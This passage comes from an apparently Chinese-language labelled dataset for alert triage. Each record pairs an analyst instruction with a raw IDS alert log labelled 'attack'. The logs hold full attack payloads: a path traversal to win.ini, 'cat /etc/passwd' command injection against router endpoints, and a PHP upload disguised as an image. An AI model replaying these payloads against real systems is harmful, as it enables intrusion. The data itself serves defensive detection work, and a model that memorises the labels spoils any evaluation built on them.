\"Windows/10\", \"software\": \"Firefox/78.0\", \"hw_type\": \"PC\"}}", "sport": "12495", "h_url": "/base_import/static/c:/windows/win.ini"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732688165", "rule_version_str": "3.0.1122.14572", "dip_group": "未分配资产组", "nid": "", "sip_group": "", "type": "命令执行", "_origin": {"write_date": 1732688165, "vuln_harm": "shell命令执行攻击是危害极高的攻击形式,攻击成功可以造成服务器被控制。", "rule_version_str": "3.0.1122.14572", "hit_field": "", "dip": "172.23.68.194", "site_app": "", "hit_end": 0, "uri": "/boafrm/formSysCmd", "dport": 30001, "vuln_name": "Shell命令执行(机器学习)", "rsp_status": 0, "code_language": "", "solution": "后端服务器语言中,严禁执行shell命令。", "hit_start": 0, "detail_info": "通过机器学习方式,检测到访问中存在shell命令执行攻击代码。", "xff": "", "sip": "223.160.174.104", "vuln_desc": "通过机器学习方式,检测到访问中存在shell命令执行攻击代码。", "public_date": "2020-11-25 19:51:41", "sport": 12141}, "detail_info": "通过机器学习方式,检测到访问中存在shell命令执行攻击代码。", "file_md5": "", "rule_key": "webids", "api": "218.76.15.56:30001/boafrm/formSysCmd", "submit-url": "%2Fsyscmd.htm", "first_access_time": "2024-11-27 14:16:05", "hazard_level": "6", "hazard_rating": "高危", "hit_field": "", "h_method": "POST", "sip_addr": "中国--北京市--北京市", "dnt": "1", "x_forwarded_for": "", "accept": "*/*", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "vuln_name": "Shell命令执行(机器学习)", "alarm_sip": "172.23.68.194", "skyeye_index": "", "sip_ioc_dip": "628cdab504ac81303963dc7fcdcc98ff", "xff": "", "vuln_desc": "通过机器学习方式,检测到访问中存在shell命令执行攻击代码。", "attack_chain": "0x02020000", "vuln_harm": "shell命令执行攻击是危害极高的攻击形式,攻击成功可以造成服务器被控制。", "dport": "30001", "alert_devip": "172.31.191.57", "syscmd": "cat+%2Fetc%2Fpasswd", "update_time": "1732688144", "code_language": "", "public_date": "2020-11-25 19:51:41", "skyeye_serial_num": "QbJK/8ze/", "site_app": "", "super_attack_chain": "0x02000000", "hit_end": "0", "h_proto_version": "HTTP/1.1", "uri": "/boafrm/formSysCmd", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "rule_id": "0x10020b6e", "attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "223.160.174.104", "host_md5": "be03eee78fc4ed0ad67ea6194767e892", "accept-encoding": "gzip", "user-agent": "Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0", "vlan_id": "", "vuln_type": "Shell命令执行(机器学习)", "attack_type": "命令执行", "is_web_attack": "1", "dip": "172.23.68.194", "repeat_count": "1", "skyeye_type": "webids-webattack_dolog", "solution": "后端服务器语言中,严禁执行shell命令。", "hit_start": "0", "skyeye_id": "", "payload": {"req_header": "UE9TVCAvYm9hZnJtL2Zvcm1TeXNDbWQgSFRUUC8xLjENCkhvc3Q6IDIxOC43Ni4xNS41NjozMDAwMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgcnY6NzguMCkgR2Vja28vMjAxMDAxMDEgRmlyZWZveC83OC4wDQpDb250ZW50LUxlbmd0aDogNjgNCkFjY2VwdDogKi8qDQpBY2NlcHQtTGFuZ3VhZ2U6IGVuLVVTLGVuO3E9MC45DQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZA0KRG50OiAxDQpVcGdyYWRlLUluc2VjdXJlLVJlcXVlc3RzOiAxDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXANCg0K", "req_body": "c3lzQ21kPWNhdCslMkZldGMlMkZwYXNzd2QmYXBwbHk9QXBwbHkmc3VibWl0LXVybD0lMkZzeXNjbWQuaHRtJm1zZz0=", "rsp_header": "", "rsp_body": ""}, "host": "218.76.15.56:30001", "host_state": "失败", "accept-language": "en-US,en;q=0.9", "rsp_body": "", "rule_desc": "网页漏洞利用", "proto": "http", "alarm_id": "20241127_b9d28cdd26493761955f368b598d7aa3", "access_time": "2024-11-27 14:16:05", "content-length": "68", "attack_addr": "中国--北京市--北京市(39.902798/116.401159)", "type_chain": "16090000", "dip_addr": "局域网", "rsp_status": "0", "branch_id": "QbJK/5PW2", "att_ck": "初始访问:TA0001|利用面向公众的应用程序:T1190", "upgrade-insecure-requests": "1", "content-type": "application/x-www-form-urlencoded", "sip": "223.160.174.104", "dimension": "3", "url_path": "/boafrm/formSysCmd", "src_mac": "00:94:a1:5e:6e:87", "apply": "Apply", "file_name": "", "confidence": "高", "rsp_header": "", "super_type": "攻击利用", "serial_num": "QbJK/8ze/", "tcp_option": "", "req_header": "POST /boafrm/formSysCmd HTTP/1.1\r\nHost: 218.76.15.56:30001\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0\r\nContent-Length: 68\r\nAccept: */*\r\nAccept-Language: en-US,en;q=0.9\r\nContent-Type: application/x-www-form-urlencoded\r\nDnt: 1\r\nUpgrade-Insecure-Requests: 1\r\nAccept-Encoding: gzip\r\n\r\n", "req_body": "sysCmd=cat+%2Fetc%2Fpasswd&apply=Apply&submit-url=%2Fsyscmd.htm&msg=", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "268569454-Shell命令执行(机器学习)", "rule_labels": "{}", "sport": "12141", "h_url": "/boafrm/formSysCmd"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732688165", "rule_version_str": "3.0.1122.14572", "dip_group": "未分配资产组", "nid": "", "sip_group": "", "type": "命令执行", "_origin": {"write_date": 1732688165, "vuln_harm": "攻击者可直接访问接口执行系统命令", "rule_version_str": "3.0.1122.14572", "hit_field": "req_body", "dip": "172.23.68.194", "site_app": "", "hit_end": 71, "uri": "/web_shell_cmd.gch", "dport": 30001, "vuln_name": "中国电信天翼网关F460命令执行漏洞", "rsp_status": 0, "code_language": "", "solution": "限制接口访问权限", "hit_start": 51, "detail_info": "中国电信天翼网关F460存在命令执行漏洞", "xff": "", "sip": "223.160.174.104", "vuln_desc": "中国电信天翼网关F460存在命令执行漏洞", "public_date": "2024-05-20 16:00:56", "sport": 12131}, "detail_info": "中国电信天翼网关F460存在命令执行漏洞", "file_md5": "12d8c9f57880d38a37795ff73ee25bdb", "rule_key": "webids", "api": "218.76.15.56:30001/web_shell_cmd.gch", "first_access_time": "2024-11-27 14:16:05", "hazard_level": "6", "hazard_rating": "高危", "hit_field": "req_body", "h_method": "POST", "sip_addr": "中国--北京市--北京市", "dnt": "1", "x_forwarded_for": "", "accept": "*/*", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "vuln_name": "中国电信天翼网关F460命令执行漏洞", "alarm_sip": "172.23.68.194", "skyeye_index": "", "if_errorparam": "SUCC", "sip_ioc_dip": "5c76f23db1080225c665a8b897eddc62", "xff": "", "vuln_desc": "中国电信天翼网关F460存在命令执行漏洞", "cmd": "cat+%2Fetc%2Fpasswd", "attack_chain": "0x02020000", "vuln_harm": "攻击者可直接访问接口执行系统命令", "dport": "30001", "alert_devip": "172.31.191.57", "if_errortype": "-1", "update_time": "1732688144", "code_language": "", "public_date": "2024-05-20 16:00:56", "skyeye_serial_num": "QbJK/8ze/", "site_app": "", "super_attack_chain": "0x02000000", "hit_end": "71", "h_proto_version": "HTTP/1.1", "uri": "/web_shell_cmd.gch", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "rule_id": "0x10021b35", "attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "223.160.174.104", "host_md5": "be03eee78fc4ed0ad67ea6194767e892", "accept-encoding": "gzip", "user-agent": "Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0", "vlan_id": "", "vuln_type": "中国电信天翼网关F460命令执行漏洞", "attack_type": "命令执行", "is_web_attack": "1", "dip": "172.23.68.194", "repeat_count": "1", "skyeye_type": "webids-webattack_dolog", "solution": "限制接口访问权限", "hit_start": "51", "skyeye_id": "", "payload": {"req_header": "UE9TVCAvd2ViX3NoZWxsX2NtZC5nY2ggSFRUUC8xLjENCkhvc3Q6IDIxOC43Ni4xNS41NjozMDAwMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgcnY6NzguMCkgR2Vja28vMjAxMDAxMDEgRmlyZWZveC83OC4wDQpDb250ZW50LUxlbmd0aDogOTkNCkFjY2VwdDogKi8qDQpBY2NlcHQtTGFuZ3VhZ2U6IGVuLVVTLGVuO3E9MC45DQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZA0KRG50OiAxDQpVcGdyYWRlLUluc2VjdXJlLVJlcXVlc3RzOiAxDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXANCg0K", "req_body": "SUZfQUNUSU9OPWFwcGx5JklGX0VSUk9SU1RSPVNVQ0MmSUZfRVJST1JQQVJBTT1TVUNDJklGX0VSUk9SVFlQRT0tMSZDbWQ9Y2F0KyUyRmV0YyUyRnBhc3N3ZCZDbWRBY2s9", "rsp_header": "", "rsp_body": ""}, "host": "218.76.15.56:30001", "host_state": "失败", "accept-language": "en-US,en;q=0.9", "if_errorstr": "SUCC", "rsp_body": "", "rule_desc": "网页漏洞利用", "proto": "http", "alarm_id": "20241127_035a41c2b3e3e71155d87320a11b1948", "access_time": "2024-11-27 14:16:05", "content-length": "99", "attack_addr": "中国--北京市--北京市(39.902798/116.401159)", "type_chain": "16090000", "dip_addr": "局域网", "rsp_status": "0", "branch_id": "QbJK/5PW2", "att_ck": "初始访问:TA0001|利用面向公众的应用程序:T1190", "upgrade-insecure-requests": "1", "content-type": "application/x-www-form-urlencoded", "sip": "223.160.174.104", "dimension": "3", "url_path": "/web_shell_cmd.gch", "src_mac": "00:94:a1:5e:6e:87", "file_name": "web_shell_cmd.gch", "confidence": "高", "rsp_header": "", "super_type": "攻击利用", "serial_num": "QbJK/8ze/", "tcp_option": "", "if_action": "apply", "req_header": "POST /web_shell_cmd.gch HTTP/1.1\r\nHost: 218.76.15.56:30001\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0\r\nContent-Length: 99\r\nAccept: */*\r\nAccept-Language: en-US,en;q=0.9\r\nContent-Type: application/x-www-form-urlencoded\r\nDnt: 1\r\nUpgrade-Insecure-Requests: 1\r\nAccept-Encoding: gzip\r\n\r\n", "req_body": "IF_ACTION=apply&IF_ERRORSTR=SUCC&IF_ERRORPARAM=SUCC&IF_ERRORTYPE=-1&Cmd=cat+%2Fetc%2Fpasswd&CmdAck=", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "268573493-中国电信天翼网关F460命令执行漏洞", "rule_labels": "{\"0x110A02\": {\"parent_name\": \"资产识别\", \"type\": \"模块名称\", \"name\": \"UA指纹识别\", \"parent_id\": \"0x110A00\", \"role\": \"C\", \"os\": \"Windows/10\", \"software\": \"Firefox/78.0\", \"hw_type\": \"PC\"}}", "sport": "12131", "h_url": "/web_shell_cmd.gch"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732688165", "rule_version_str": "3.0.1122.14572", "dip_group": "未分配资产组", "nid": "", "sip_group": "", "type": "文件上传", "_origin": {"write_date": 1732688165, "vuln_harm": "可能是恶意webshell,导致服务器失陷。", "rule_version_str": "3.0.1122.14572", "hit_field": "req_body", "dip": "172.23.68.194", "site_app": "", "hit_end": 167, "uri": "/Upload/upload_file.php?l=qmzan", "dport": 30001, "vuln_name": "发现PHP脚本文件上传行为", "rsp_status": 0, "code_language": "PHP", "solution": "确认上传的脚本是否有害,如有害尽快删除。", "hit_start": 147, "detail_info": "发现上传PHP脚本行为,php脚本是用PHP语言编写的在线管理程序,实用、简洁、小巧。此告警发现黑客正在上传php后门程序,严重可导致服务器信息泄露。", "xff": "", "sip": "223.160.174.104", "vuln_desc": "发现上传PHP脚本行为,php脚本是用PHP语言编写的在线管理程序,实用、简洁、小巧。此告警发现黑客正在上传php后门程序,严重可导致服务器信息泄露。", "public_date": "2020-05-18 17:06:06", "sport": 12150}, "detail_info": "发现上传PHP脚本行为,php脚本是用PHP语言编写的在线管理程序,实用、简洁、小巧。此告警发现黑客正在上传php后门程序,严重可导致服务器信息泄露。", "file_md5": "afc68e187c41338dfc3196e181e2e0e2", "rule_key": "webids", "api": "218.76.15.56:30001/Upload/{filename}", "first_access_time": "2024-11-27 14:16:05", "hazard_level": "6", "hazard_rating": "高危", "hit_field": "req_body", "h_method": "POST", "sip_addr": "中国--北京市--北京市", "dnt": "1", "x_forwarded_for": "", "accept": "*/*", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "vuln_name": "发现PHP脚本文件上传行为", "alarm_sip": "172.23.68.194", "skyeye_index": "", "sip_ioc_dip": "a893771ec5598e7288f9a60e1946824f", "xff": "", "vuln_desc": "发现上传PHP脚本行为,php脚本是用PHP语言编写的在线管理程序,实用、简洁、小巧。此告警发现黑客正在上传php后门程序,严重可导致服务器信息泄露。", "attack_chain": "0x02020000", "vuln_harm": "可能是恶意webshell,导致服务器失陷。", "dport": "30001", "alert_devip": "172.31.191.57", "update_time": "1732688144", "code_language": "PHP", "public_date": "2020-05-18 17:06:06", "skyeye_serial_num": "QbJK/8ze/", "site_app": "", "super_attack_chain": "0x02000000", "hit_end": "167", "h_proto_version": "HTTP/1.1", "l": "qmzan", "uri": "/Upload/upload_file.php?l=qmzan", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "rule_id": "0x100208ac", "attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "223.160.174.104", "host_md5": "be03eee78fc4ed0ad67ea6194767e892", "accept-encoding": "gzip", "user-agent": "Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0", "vlan_id": "", "vuln_type": "发现PHP脚本文件上传行为", "attack_type": "文件上传", "is_web_attack": "1", "dip": "172.23.68.194", "repeat_count": "1", "skyeye_type": "webids-webattack_dolog", "solution": "确认上传的脚本是否有害,如有害尽快删除。", "hit_start": "147", "skyeye_id": "", "payload": {"req_header": "UE9TVCAvVXBsb2FkL3VwbG9hZF9maWxlLnBocD9sPXFtemFuIEhUVFAvMS4xDQpIb3N0OiAyMTguNzYuMTUuNTY6MzAwMDENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDEwLjA7IHJ2Ojc4LjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvNzguMA0KQ29udGVudC1MZW5ndGg6IDE5Nw0KQWNjZXB0OiAqLyoNCkFjY2VwdC1MYW5ndWFnZTogZW4tVVMsZW47cT0wLjkNCkNvbnRlbnQtVHlwZTogbXVsdGlwYXJ0L2Zvcm0tZGF0YTsgYm91bmRhcnk9LS0tLXdzcmVxbmdnY29qdWR0c2Jka2dmDQpEbnQ6IDENClVwZ3JhZGUtSW5zZWN1cmUtUmVxdWVzdHM6IDENCkFjY2VwdC1FbmNvZGluZzogZ3ppcA0KDQo=", "req_body": "LS0tLS0td3NyZXFuZ2djb2p1ZHRzYmRrZ2YKQ29udGVudC1EaXNwb3NpdGlvbjogZm9ybS1kYXRhOyBuYW1lPSJmaWxlIjsgZmlsZW5hbWU9InJvd2RmcXZmbHUucGhwIgpDb250ZW50LVR5cGU6IGltYWdlL2F2aWYKCjw/cGhwIGVjaG8gbWQ1KDEwODE1Nzc2KTt1bmxpbmsoX19GSUxFX18pOz8+Ci0tLS0tLXdzcmVxbmdnY29qdWR0c2Jka2dmLS0=", "rsp_header": "", "rsp_body": ""}, "host": "218.76.15.56:30001", "host_state": "失败", "accept-language": "en-US,en;q=0.9", "rsp_body": "", "rule_desc": "网页漏洞利用", "proto": "http", "alarm_id": "20241127_315db41206a9cc7d31987e9e97b2f19e", "access_time": "2024-11-27 14:16:05", "content-length": "197", "attack_addr": "中国--北京市--北京市(39.902798/116.401159)", "type_chain": "16110000", "dip_addr": "局域网", "rsp_status": "0", "branch_id": "QbJK/5PW2", "att_ck": "初始访问:TA0001|路过式攻击:T1189", "upgrade-insecure-requests": "1", "content-type": "multipart/form-data; boundary=----wsreqnggcojudtsbdkgf", "sip": "223.160.174.104", "dimension": "3", "url_path": "/Upload/upload_file.php", "src_mac": "00:94:a1:5e:6e:87", "file_name": "upload_file.php", "confidence": "中", "rsp_header": "", "super_type": "攻击利用", "serial_num": "QbJK/8ze/", "tcp_option": "", "req_header": "POST /Upload/upload_file.php?l=qmzan HTTP/1.1\r\nHost: 218.76.15.56:30001\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0\r\nContent-Length: 197\r\nAccept: */*\r\nAccept-Language: en-US,en;q=0.9\r\nContent-Type: multipart/form-data; boundary=----wsreqnggcojudtsbdkgf\r\nDnt: 1\r\nUpgrade-Insecure-Requests: 1\r\nAccept-Encoding: gzip\r\n\r\n", "req_body": "------wsreqnggcojudtsbdkgf\nContent-Disposition: form-data; name=\"file\"; filename=\"rowdfqvflu.php\"\nContent-Type: image/avif\n\n<?php echo md5(10815776);unlink(__FILE__);?>\n------wsreqnggcojudtsbdkgf--", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "268568748-发现PHP脚本文件上传行为", "rule_labels": "{\"0x110A02\": {\"parent_name\": \"资产识别\", \"type\": \"模块名称\", \"name\": \"UA指纹识别\", \"parent_id\": \"0x110A00\", \"role\": \"C\", \"os\": \"Windows/10\", \"software\": \"Firefox/78.0\", \"hw_type\": \"PC\"}}", "sport": "12150", "h_url": "/Upload/upload_file.php?l=qmzan"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732688165", "rule_version_str": "3.0.1122.14572", "dip_group": "未分配资产组", "nid": "", "sip_group": "", "type": "webshell上传", "_origin": {"write_date": 1732688165, "vuln_harm": "受害主机可能将会被植入后门、远控或木马,导致受害主机沦陷,成为傀儡机。", "rule_version_str": "3.0.1122.14572", "hit_field": "req_body", "dip": "172.23.68.194", "site_app": "其他", "hit_end": 137, "uri": "/Upload/upload_file.php?l=qmzan", "dport": 30001, "vuln_name": "发现上传php_webshell木马行为", "rsp_status": 0, "code_language": "PHP", "solution": "请尽快排查受害主机上是否存在php_webshell并进行查杀,并修复系统漏洞。", "hit_start": 117, "detail_info": "发现上传php_webshell行为,php_webshell是用PHP语言编写的在线管理程序,实用、简洁、小巧。此告警发现黑客正在上传php后门程序,严重可导致服务器信息泄露。", "xff": "", "sip": "223.160.174.104", "vuln_desc": "发现上传php_webshell行为,php_webshell是用PHP语言编写的在线管理程序,实用、简洁、小巧。此告警发现黑客正在上传php后门程序,严重可导致服务器信息泄露。", "public_date": "2018-07-10 15:05:56", "sport": 12150}, "detail_info": "发现上传php_webshell行为,php_webshell是用PHP语言编写的在线管理程序,实用、简洁、小巧。此告警发现黑客正在上传php后门程序,严重可导致服务器信息泄露。", "file_md5": "afc68e187c41338dfc3196e181e2e0e2", "rule_key": "webids", "api": "218.76.15.56:30001/Upload/{filename}", "first_access_time": "2024-11-27 14:16:05", "hazard_level": "6", "hazard_rating": "高危", "hit_field": "req_body", "h_method": "POST", "sip_addr": "中国--北京市--北京市", "dnt": "1", "x_forwarded_for": "", "accept": "*/*", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "vuln_name": "发现上传php_webshell木马行为", "alarm_sip": "172.23.68.194", "skyeye_index": "", "sip_ioc_dip": "d1edb46d389bb6ee5fd6df525abfecc4", "xff": "", "vuln_desc": "发现上传php_webshell行为,php_webshell是用PHP语言编写的在线管理程序,实用、简洁、小巧。此告警发现黑客正在上传php后门程序,严重可导致服务器信息泄露。", "attack_chain": "0x02020000", "vuln_harm": "受害主机可能将会被植入后门、远控或木马,导致受害主机沦陷,成为傀儡机。", "dport": "30001", "alert_devip": "172.31.191.57", "update_time": "1732688144", "code_language": "PHP", "public_date": "2018-07-10 15:05:56", "skyeye_serial_num": "QbJK/8ze/", "site_app": "其他", "super_attack_chain": "0x02000000", "hit_end": "137", "h_proto_version": "HTTP/1.1", "l": "qmzan", "uri": "/Upload/upload_file.php?l=qmzan", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "rule_id": "0x1002052a", "attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "223.160.174.104", "host_md5": "be03eee78fc4ed0ad67ea6194767e892", "accept-encoding": "gzip", "user-agent": "Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0", "vlan_id": "", "vuln_type": "发现上传php_webshell木马行为", "attack_type": "webshell上传", "is_web_attack": "1", "dip": "172.23.68.194", "repeat_count": "1", "skyeye_type": "webids-webattack_dolog", "solution": "请尽快排查受害主机上是否存在php_webshell并进行查杀,并修复系统漏洞。", "hit_start": "117", "skyeye_id": "", "payload": {"req_header": "UE9TVCAvVXBsb2FkL3VwbG9hZF9maWxlLnBocD9sPXFtemFuIEhUVFAvMS4xDQpIb3N0OiAyMTguNzYuMTUuNTY6MzAwMDENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDEwLjA7IHJ2Ojc4LjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvNzguMA0KQ29udGVudC1MZW5ndGg6IDE5Nw0KQWNjZXB0OiAqLyoNCkFjY2VwdC1MYW5ndWFnZTogZW4tVVMsZW47cT0wLjkNCkNvbnRlbnQtVHlwZTogbXVsdGlwYXJ0L2Zvcm0tZGF0YTsgYm91bmRhcnk9LS0tLXdzcmVxbmdnY29qdWR0c2Jka2dmDQpEbnQ6IDENClVwZ3JhZGUtSW5zZWN1cmUtUmVxdWVzdHM6IDENCkFjY2VwdC1FbmNvZGluZzogZ3ppcA0KDQo=", "req_body": "LS0tLS0td3NyZXFuZ2djb2p1ZHRzYmRrZ2YKQ29udGVudC1EaXNwb3NpdGlvbjogZm9ybS1kYXRhOyBuYW1lPSJmaWxlIjsgZmlsZW5hbWU9InJvd2RmcXZmbHUucGhwIgpDb250ZW50LVR5cGU6IGltYWdlL2F2aWYKCjw/cGhwIGVjaG8gbWQ1KDEwODE1Nzc2KTt1bmxpbmsoX19GSUxFX18pOz8+Ci0tLS0tLXdzcmVxbmdnY29qdWR0c2Jka2dmLS0=", "rsp_header": "", "rsp_body": ""}, "host": "218.76.15.56:30001", "host_state": "失败", "accept-language": "en-US,en;q=0.9", "rsp_body": "", "rule_desc": "网页漏洞利用", "proto": "http", "alarm_id": "20241127_04d35773a82ad091e7d80a9554a24e4c", "access_time": "2024-11-27 14:16:05", "content-length": "197", "attack_addr": "中国--北京市--北京市(39.902798/116.401159)", "type_chain": "161C0000", "dip_addr": "局域网", "rsp_status": "0", "branch_id": "QbJK/5PW2", "att_ck": "初始访问:TA0001|利用面向公众的应用程序:T1190", "upgrade-insecure-requests": "1", "content-type": "multipart/form-data; boundary=----wsreqnggcojudtsbdkgf", "sip": "223.160.174.104", "dimension": "3", "url_path": "/Upload/upload_file.php", "src_mac": "00:94:a1:5e:6e:87", "file_name": "upload_file.php", "confidence": "中", "rsp_header": "", "super_type": "攻击利用", "serial_num": "QbJK/8ze/", "tcp_option": "", "req_header": "POST /Upload/upload_file.php?l=qmzan HTTP/1.1\r\nHost: 218.76.15.56:30001\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0\r\nContent-Length: 197\r\nAccept: */*\r\nAccept-Language: en-US,en;q=0.9\r\nContent-Type: multipart/form-data; boundary=----wsreqnggcojudtsbdkgf\r\nDnt: 1\r\nUpgrade-Insecure-Requests: 1\r\nAccept-Encoding: gzip\r\n\r\n", "req_body": "------wsreqnggcojudtsbdkgf\nContent-Disposition: form-data; name=\"file\"; filename=\"rowdfqvflu.php\"\nContent-Type: image/avif\n\n<?php echo md5(10815776);unlink(__FILE__);?>\n------wsreqnggcojudtsbdkgf--", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "268567850-发现上传php_webshell木马行为", "rule_labels": "{\"0x110101\": {\"parent_id\": \"0x110100\", \"type\": \"攻击阶段\", \"name\": \"后门上传\", \"parent_name\": \"后门上传利用\"}, \"0x110A02\": {\"parent_name\": \"资产识别\", \"type\": \"模块名称\", \"name\": \"UA指纹识别\", \"parent_id\": \"0x110A00\", \"role\": \"C\", \"os\": \"Windows/10\", \"software\": \"Firefox/78.0\", \"hw_type\": \"PC\"}}", "sport": "12150", "h_url": "/Upload/upload_file.php?l=qmzan"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732688165", "rule_version_str": "3.0.1122.14572", "dip_group": "未分配资产组", "nid": "", "sip_group": "", "type": "文件上传", "_origin": {"write_date": 1732688165, "vuln_harm": "攻击者通过文件上传获取一个webshell后,使用浏览器来访问这些后门,得到一个命令执行环境,以达到控制网站服务器的目的(可以上传下载或者修改文件,操作数据库,执行任意命令等)", "rule_version_str": "3.0.1122.14572", "hit_field": "req_body", "dip": "172.23.68.194", "site_app": "通用", "hit_end": 96, "uri": "/Upload/upload_file.php?l=qmzan", "dport": 30001, "vuln_name": "发现脚本文件上传行为", "rsp_status": 0, "code_language": "通用", "solution": "1、文件上传的目录设置为不可执行权限\r\n2、判断文件类型,后缀名,内容等\r\n3、使用随机数改写文件名和文件路径", "hit_start": 76, "detail_info": "文件上传漏洞是指网络攻击者上传了一个可执行的文件到服务器并执行。这里上传的文件可以是木马,病毒,恶意脚本或者WebShell等。这种攻击方式是最为直接和有效的,部分文件上传漏洞的利用技术门槛非常的低,对于攻击者来说很容易实施。", "xff": "", "sip": "223.160.174.104", "vuln_desc": "文件上传漏洞是指网络攻击者上传了一个可执行的文件到服务器并执行。这里上传的文件可以是木马,病毒,恶意脚本或者WebShell等。这种攻击方式是最为直接和有效的,部分文件上传漏洞的利用技术门槛非常的低,对于攻击者来说很容易实施。", "public_date": "2018-08-20 18:32:27", "sport": 12150}, "detail_info": "文件上传漏洞是指网络攻击者上传了一个可执行的文件到服务器并执行。这里上传的文件可以是木马,病毒,恶意脚本或者WebShell等。这种攻击方式是最为直接和有效的,部分文件上传漏洞的利用技术门槛非常的低,对于攻击者来说很容易实施。", "file_md5": "afc68e187c41338dfc3196e181e2e0e2", "rule_key": "webids", "api": "218.76.15.56:30001/Upload/{filename}", "first_access_time": "2024-11-27 14:16:05", "hazard_level": "6", "hazard_rating": "高危", "hit_field": "req_body", "h_method": "POST", "sip_addr": "中国--北京市--北京市", "dnt": "1", "x_forwarded_for": "", "accept": "*/*", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "vuln_name": "发现脚本文件上传行为", "alarm_sip": "172.23.68.194", "skyeye_index": "", "sip_ioc_dip": "c5e1a0a128959714ad89256207cc5edf", "xff": "", "vuln_desc": "文件上传漏洞是指网络攻击者上传了一个可执行的文件到服务器并执行。这里上传的文件可以是木马,病毒,恶意脚本或者WebShell等。这种攻击方式是最为直接和有效的,部分文件上传漏洞的利用技术门槛非常的低,对于攻击者来说很容易实施。", "attack_chain": "0x02010000", "vuln_harm": "攻击者通过文件上传获取一个webshell后,使用浏览器来访问这些后门,得到一个命令执行环境,以达到控制网站服务器的目的(可以上传下载或者修改文件,操作数据库,执行任意命令等)", "dport": "30001", "alert_devip": "172.31.191.57", "update_time": "1732688144", "code_language": "通用", "public_date": "2018-08-20 18:32:27", "skyeye_serial_num": "QbJK/8ze/", "site_app": "通用", "super_attack_chain": "0x02000000", "hit_end": "96", "h_proto_version": "HTTP/1.1", "l": "qmzan", "uri": "/Upload/upload_file.php?l=qmzan", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "rule_id": "0x1002055e", "attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "223.160.174.104", "host_md5": "be03eee78fc4ed0ad67ea6194767e892", "accept-encoding": "gzip", "user-agent": "Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0", "vlan_id": "", "vuln_type": "发现脚本文件上传行为", "attack_type": "文件上传", "is_web_attack": "1", "dip": "172.23.68.194", "repeat_count": "1", "skyeye_type": "webids-webattack_dolog", "solution": "1、文件上传的目录设置为不可执行权限\r\n2、判断文件类型,后缀名,内容等\r\n3、使用随机数改写文件名和文件路径", "hit_start": "76", "skyeye_id": "", "payload": {"req_header": 